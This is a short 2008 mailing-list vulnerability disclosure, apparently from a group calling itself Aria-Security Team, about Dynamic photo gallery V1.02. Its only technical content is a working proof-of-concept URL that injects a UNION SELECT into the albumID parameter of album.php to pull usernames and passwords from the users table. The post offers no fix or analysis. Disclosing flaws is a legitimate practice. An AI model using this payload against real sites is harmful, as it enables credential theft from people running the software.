Dynamic photo gallery V1.02 SQL Injection
Date: 2 Mar 2008 03:34:18 -0000
From: [email protected]
To: [email protected]
Subject: Dynamic photo gallery V1.02 SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
Aria-Security Team
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521
PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users
Regards
The-0utl4w
